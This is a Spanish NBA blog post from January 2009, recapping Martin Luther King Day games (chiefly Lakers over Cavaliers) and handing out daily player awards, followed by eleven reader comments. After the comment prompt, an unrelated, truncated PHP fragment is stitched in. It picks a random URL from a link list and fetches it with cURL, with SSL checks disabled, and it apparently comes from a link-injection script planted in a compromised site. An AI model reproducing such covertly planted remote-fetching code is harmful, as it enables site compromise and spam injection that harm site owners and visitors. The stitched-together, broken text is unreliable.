La crónica (MLK Day)

20 de January de 2009 por MagicJohnson32

lebkobefingerEra un día especial, y quedó más que claro durante las retransmisiones de los partidos de la NBA. En todas las cadenas se produjo un incesante goteo de testimonios de jugadores acerca del legado de Martin Luther King. La TNT, que emitió un triple-header (tres partidos consecutivos) y mantuvo en todo momento el rótulo “Remembering MLK”, tuvo el acierto de aportar unas palabras de Steve Nash (blanco y canadiense). Pero nosotros, sinceramente, lo que queríamos ver era baloncesto. Y de eso hubo mucho y muy bueno.

La guinda a la maratoniana jornada, que empezó a las 7 de la tarde hora peninsular y acabó 12 horas más tarde, la pusieron Cavaliers y Lakers. El anticipado cara a cara entre LeBron y Kobe estuvo a punto de irse al traste a los dos minutos de juego cuando Bryant se dislocó el dedo índice de su mano derecha (algo totalmente ajeno a su lesión en el meñique). El miedo recorrió la espina dorsal de la afición angelina pero, sorprendentemente, Kobe fue al banquillo, le recolocaron el dedo, le aplicaron un vendaje protector y volvió a la pista sin perder ni un segundo de juego pese al evidente dolor. Con Bryant un tanto limitado, Gasol dio lo mejor de si en ataque con una exhibición de efectividad, anotó 11 de sus 13 tiros, y atrapó 12 rebotes. Además, Bynum, Fisher, Ariza y Vujacic anotaron en dobles figuras. Bryant y James se defendieron mutuamente durante buena parte del encuentro y ambos hicieron una buena labor; la diferencia vino por las 12 asistencias que repartió Kobe ayudado por el mayor acierto de los jugadores locales.

El triunfo angelino deja a los Cavs sin liderato del Este, que queda en manos de los Magic (con las mismas 8 derrotas pero con dos victorias más). Aunque el equipo con más triunfos de la liga son los Celtics, que suman cinco victorias consecutivas tras destrozar anoche a los Suns, especialmente a un Amaré irreconocible y que se ganó con creces el premio más dudoso de cuantos entregamos diariamente.

Pese a este partido y a la sufrida victoria de los Pistons en Memphis de la mano de Iverson, fue un día de superioridad del Oeste, que se llevaron 6 de los 8 duelos interconferencias. Por ejemplo, los Mavs acabaron con la racha de los Sixers gracias a un inconmensurable Kidd y a un buzzer beater de Nowitzki, negado casi todo el partido pero que apareció a tiempo para echar al traste la increíble remontada de los locales (perdían por 12 a dos minutos para el final y lograron empatar a falta de 8 segundos). Igualmente emocionantes fueron las victorias de Spurs en Charlotte y Hornets ante Indiana. Los de San Antonio sufrieron literalmente hasta el último segundo, ya que los Bobcats dispusieron de dos ocasiones para empatar o ganar el partido pero Duncan taponó el tiro de Felton y el triple a la desesperada de Diaw no entró. Lo de los Hornets tuvo más mérito, ya que tuvieron que recuperarse a la baja de David West, a la lesión durante el partido de Chandler y al triple con el que Granger empató a falta de 2.8 segundos. Ahí apareció Chris Paul, que recibió, botó y anotó sobre la bocina su único triple en los últimos cuatro partidos.

Las otras dos victorias del Oeste sobre el Este fueron mucho más cómodas. Los Warriors no tuvieron problemas frente a los Wizards y los Blazers superaron a los Bucks con la mejor actuación de Greg Oden en la NBA.

Por su parte, unos Clippers a los que sólo les queda por lesionarse Dunleavy perdieron frente a los Wolves, en los que funcionó a la perfección el cuarteto Foye-Jefferson-Smith-Gomes. Y la igualdad fue la nota común en los tres partidos restantes. En el caso del NuggetsRockets, la igualdad fue acompañada de polémica, ya que una discutible falta en ataque de Kleiza evitó que Denver se pusiera un punto por encima a escasos segundos para el final. Yao lideró el ataque de los Rockets pero, curiosamente, no atrapó un solo rebote defensivo. En Atlanta, los Hawks vencieron a los Raptors, que siguen en caída libre pese al rendimiento de Bargnani. Los canadienses no anotaron en los últimos 2:20 de partido y una canasta de Joe Johnson acabó sentenciando. Y algo similar hicieron los Bulls, que sólo lograron un punto en los últimos 2:30 y facilitaron así las cosas a los Knicks, que sobrevivieron al mal día de David Lee.

PREMIOS

MVP: Mi madre que muchas veces lo mejor es callarse. Ayer mismo comentábamos en el Informe Semanal que Dirk se encontraba demasiado solo en Dallas y hoy nos despertamos con 22 puntos, 12 rebotes, 6 asistencias, 6 triples y 8 de 11 en tiros de campo de uno de sus cumpañeros. Toda una exhibición en toda regla de Mr.Triple Doble, Jason Kidd.

El rookie: Buenos partidos de habituales como Derrick Rose y Eric Gordon y menciones para DeAndre Jordan y sus 8 puntos, 10 rebotes y 6 tapones y Danilo Gallinari, que tras su larga lesión disputa sus primeros minutos. Pero el rookie del día es sin duda Greg Oden. Sus 24 puntos y 15 rebotes destrozaron literalmente el pobre juego interior de los Bucks.

La sorpresa: Andrey Blatche y Louis Williams nos obsequían de vez en cuando con una muy buena actuación pero que Steve Novak se vaya a los 18 puntos no es nada habitual. Es lo que tienen las plagas de lesiones…

La decepción: Ver a David Lee hacer un 3 de 14, a Prince un 2 de 12 y a Nocioni un 1 de 9 es decepcionante de verdad pero el 0 de 7, 1 rebote y 3 puntos de un All-Stars como Amare Stoudamire es para restregarse los ojos y volver a mirar el Box Score.

El mayor esfuerzo en vano: Propongo que a partir de ahora esta sección pase a llamarse “Premio Danny Granger“. De nuevo 30 puntos y de nuevo derrota. Los partidos de Nene y Bosh también se hubieran merecido probar las mieles del triunfo.

Comenta

11 comentarios a esta entrada

  1. Pow_Brolin dice:
    #1

    Ya tocaba ver jugar “Il Gatto” … ahora falta que demuestre el buen jugador que tiene dentro.

      Citar

  2. Gallis dice:
    #2

    Sobre el Lakers-Cavs, aparte del partidazo de Gasol (ese tiro desde 5 metros empieza a ser temible), destacar las actuaciones de Vujacic, muy activo sobre todo en defensa y de Bynum. Da gusto ver a un pívot imponerse a base de fundamentos y no de kilos…

    También he visto el último cuarto del Hawks-Raptors y es para hacérselo mirar el partido que pierden los Raptors…los últimos 3 minutos son un catalogo de todas las decisiones erróneas que se deben tomar para perder un partido que tienes ganado…

      Citar

  3. MagicJohnson32 dice:
    #3

    Fue impresionante el acierto de Pau en ese tiro de 5 metros. No es raro verle lanzar desde ahí, pero sí que lo haga con esa seguridad y acierto. Sería una grandísima noticia que lo hiciese con más frecuencia.

    También me encantó Sasha. En ataque hace lo que hace. Si las mete bien, y si no, también. Y ese es su mérito. Y también lo que comentas de su defensa. Sasha es la prueba de que se puede aportar en defensa sin aptitud pero con actitud. A Bynum le echo en falta más tensión a la hora de rebotear, pero es verdad que es un gusto verlo moverse atacando el aro.

      Citar

  4. Txusma dice:
    #4

    Es posiblemente en los últimos minutos cuando es más necesario para un equipo tener en la cancha jugadores inteligentes o al menos un base que dirija el cotarro. Ya es el segundo partido q durante muchos minutos Toronto juega sin base incluidos los 2 ultimos minutos de partido en que se fue Ukic…

      Citar

  5. Viva_Dirk dice:
    #5

    Veo que no comentais el partido de Ariza, para mi después de Pau fue el mas importante, vaya manera de secar a Lebron en el último cuarto, Lakers rompe el partido con dos robos suyos que acaban en contraataque.

    Espero que no lo dejemos ir a final de temporada.

      Citar

  6. couxe dice:
    #6

    No se si recordáis cuando Pau llegó a la nba… Por entonces solía buscar muchísimo que le defendiesen a 5-6 metros del aro, donde tenía una enorme superioridad de velocidad y agilidad contra gente de su envergadura, o de altura y visión contra gente más baja… Muy poca gente sabía defenderlo en condiciones…
    Desde hace unos años, coincidiendo con su etapa de pívot, tiende a recibir el balón en posiciones más interiores, donde también es bueno, pero donde aprovecha bastante menos su capacidad de tiro, pase y dribling…
    No le vendría nada mal recuperar esa faceta suya… Recuerdo que jugando en el Barça, incluso se jugaba triples… aunque nunca fué un gran tirador de 3 …

      Citar

  7. MagicJohnson32 dice:
    #7

    A Viva… Es cierto, los últimos minutos de Ariza fueron apoteósicos. Metió 8 puntos en algo así como 30 segundos o menos. Aunque hasta entonces había estado bastante flojo. Pero sí, es un gran jugador, me encanta su actitud, su energía.

    A Couxe… Es curioso, porque Pau sigue siendo casi imparable cuando recibe a media distancia y encara a su defensor. Dispone de los recursos y la envergadura para ello. Además, ahora es más fuerte y pesado, con lo que tiene más facilidad para sacar el lanzamiento pese a que haya contacto.

      Citar

  8. kantonyo dice:
    #8

    A mi tambien me encanta Ariza, es un jugador que gusta verlo, por sus cualidades atleticas y por su elegancia en el salto. Yo como no soy de Lakers, prefiero que al final de año se vaya, y sea referencia en alguna franquicia…

      Citar

  9. Txusma dice:
    #9

    No acabo de ver yo a Ariza como referencia en inguna franquicia. Como jugador defensivo, capaz de anotar cuando el equipo lo necesita vale, pero nada mas alla que eso… Tercer espada a lo sumo.

      Citar

  10. Vader dice:
    #10

    Ariza es un jugador complemetario de plantilla, no puede ser nada más. Y si, Gasol rinde mucho mejor de 4 que de 5.

    Saludos

      Citar

  11. MagicJohnson32 dice:
    #11

    El papel de Ariza ha de ser exactamente el que tiene ahora en los Lakers. Puede jugar 30 ó 35 minutos en partidos determinados pero no recae en él una excesiva responsabilidad y puede marcar diferencias con minutos limitados.

    Dicho lo cual… Ariza Rules!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>